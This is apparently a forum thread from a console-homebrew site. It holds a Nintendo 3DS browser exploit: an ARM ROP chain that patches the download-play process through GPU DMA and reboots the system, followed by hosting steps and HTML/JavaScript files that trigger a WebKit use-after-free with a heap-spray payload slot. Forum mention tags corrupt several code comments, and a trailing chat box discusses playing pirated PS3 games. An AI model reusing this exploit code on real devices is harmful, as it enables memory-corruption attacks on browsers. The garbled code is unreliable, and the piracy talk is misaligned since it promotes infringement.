#define DLPLAY_NSSHANDLE_LOC_VA 0x001A5200
#define SPIDER_GSPHEAPBUF 0x18410000
#define SPIDER_ROP_LOC 0x08B85400
.global _start
spiderRop:
@copy code to dlplay
@copy patch
.word 0x0012A3D4 @ LDMFD SP!, {R0-R4,PC}
.word SPIDER_GSPHEAPBUF @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayCode @ r1 (src)
.word dlplayCode_end-dlplayCode @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B5C @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word 0xDEADC0DE @ r9 (garbage)
.word 0xDEADC0DE @ r10 (garbage)
[USER=273536]flush[/USER] data cache
.word 0x0012A3D4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012C228 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010C320 @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228B10 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand @ r1 (cmd addr)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012BF4C @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word 0x0010C320 @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228B10 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0010420C @ svc 0xa | bx lr
@copy gsp interrupt handler table to linear heap
[USER=273536]flush[/USER] data cache
.word 0x0012A3D4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012C228 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010C320 @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228B10 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand2 @ r1 (cmd addr)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012BF4C @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word 0x0010C320 @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228B10 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0010420C @ svc 0xa | bx lr
@ needed for ROP
.word 0x0010C320 @ pop {r0, pc}
.word SPIDER_ROP_LOC+0x8C @ r0 InitData 1
@copy gsp interrupt handler table back to dlplay after patching it
@patch table
.word 0x0012A3D4 @ LDMFD SP!, {R0-R4,PC}
.word SPIDER_GSPHEAPBUF+0x90 @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayHook @ r1 (src)
.word dlplayHook_end-dlplayHook @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B5C @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word SPIDER_ROP_LOC @ r9 (needed for rop) InitData 2
.word 0x001057E0 @ r10 (needed for rop) InitData 3
.word 0x001057E0 @ POP {PC} (needed for rop) InitData 4
[USER=273536]flush[/USER] data cache
.word 0x0012A3D4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012C228 @ GSPGPU_FlushDataCache
@ needed for ROP
.word 0x0010C320 @ pop {r0, pc} (needed for rop) InitData 5
.word SPIDER_ROP_LOC+0x218 @ r7 (needed for rop) InitData 6
@send GX command
.word 0x0010C320 @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228B10 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand3 @ r1 (cmd addr)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012BF4C @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@trigger spider crash to return to menu
.word 0xFFFFFFFF
@ copy code stub to end of dlplay .text
.align 0x4
gxCommand:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF [USER=64882]source[/USER] address
.word DLPLAY_CODE_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table to spider linear heap
.align 0x4
gxCommand2:
.word 0x00000004 @command header (SetTextureCopy)
.word DLPLAY_HOOK_LOC [USER=64882]source[/USER] address
.word SPIDER_GSPHEAPBUF @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table back to dplay for spider linear heap
.align 0x4
gxCommand3:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF [USER=64882]source[/USER] address
.word DLPLAY_HOOK_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
.align 0x4
dlplayHook:
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
dlplayHook_end:
myself:
.word SPIDER_ROP_LOC+myself @ Self 1
.word 0x001057E0 @ Self 2
.fill 7, 4, 0xDEADC0DE
.word 0x0013038C @ Self 3
.align 0x4
dlplayCode:
ldr r0, =DLPLAY_NSSHANDLE_LOC_VA @ ns:s handle location
ldr r0, [r0]
mrc p15, 0, r1, c13, c0, 3
add r1, #0x80
ldr r2, =0x00100180 @ NSS:RebootSystem
str r2, [r1], #4
ldr r2, =0x00000001 @ flag
str r2, [r1], #4
ldr r2, =0x00000000 @ lower word PID (0 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ upper word PID
str r2, [r1], #4
ldr r2, =0x00000002 @ mediatype (2 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ reserved
str r2, [r1], #4
ldr r2, =0x00000000 @ flag
str r2, [r1], #4
.word 0xef000032 @ svc 0x32 (sendsyncrequest)
[USER=68715]sleep[/USER] forever and ever...
ldr r0, =0xFFFFFFFF
ldr r1, =0x0FFFFFFF
.word 0xef00000a @ svc 0xa (sleep)
.pool
dlplayCode_end:
how do i host this ln my own website server so i dont have to go to loadcode.projectpokemon.org?
Do you mean via your computer or on an external server? If you don't know how to port forward, I suggest 00webhost. You can upload the index and frame .HTMLs to the server, and test it as you please.
All thats needed for this is a frame and index.html?... thats simple. Where can i get these Files?
>Compile Browserify.
>Use Browserify to compile your loadcode binary as Javascript.
>Make a new .html document named frame.html.
>Paste this inside:
Code:
<html>
<head>
<script>
var nb = 0;
function handleBeforeLoad() {
if (++nb == 1) {
p.addEventListener('DOMSubtreeModified', parent.dsm, false);
} else if (nb == 2) {
p.removeChild(f);
}
}
function documentLoaded() {
f = window.frameElement;
p = f.parentNode;
var o = document.createElement("object");
o.addEventListener('beforeload', handleBeforeLoad, false);
document.body.appendChild(o);
}
window.onload = documentLoaded;
</script>
</head>
<body>
KEKEKEKEK...
</body>
</html>>Paste this inside:
Code:
<html>
<head>
<style>
body {
color:white;
background:black;
}
</style>
<script>
function magicfun(mem, size, v) {
var a = new Array(size - 20);
nv = v + unescape("%ucccc");
for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
mem.push(t);
}
function dsm(evnt) {
var mem = [];
for (var j = 20; j < 430; j++) {
magicfun(mem, j, unescape("YOUR PAYLOAD HERE"));
}
}
</script>
</head>
<body>
<h1 align="center">LOADING ROP...</h1>
<iframe width=0 height=0 src="frame.html"></iframe>
</body>
</html>>Host both.
>Profit.
Edit: I'm hopeful that Yifan posts some news, even slight, sometime soon. I am becoming terribly bored being on 8.x, and I can't update to 9.4 if I want to use the exploit he talked of. I have attempted to convert S3DST to 8.x, and have only got some of it to work. I'm tempted to disassemble my 2DS, see if the NAND set up is the same as the 3DS, hard-mod a NAND flasher into it, dump my current firmware, update, dump, play, then reflash 8.1 when he is done.
Similar threads
- No one is chatting at the moment.
-
-
-
@
Xdqwerty:
Is it safe to update a modded ps3?
Can I play online in pirated games? (with ps3hen either enabled or not) -
-
-
-
-
-
@
Xdqwerty:
@salazarcosplay, I used apollo save tool to activate my ps3 offline so i could play a game that wasnt working
-
S @ salazarcosplay:from what I understood. you load up the piratged game. you the clear the syscalls, then you play
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
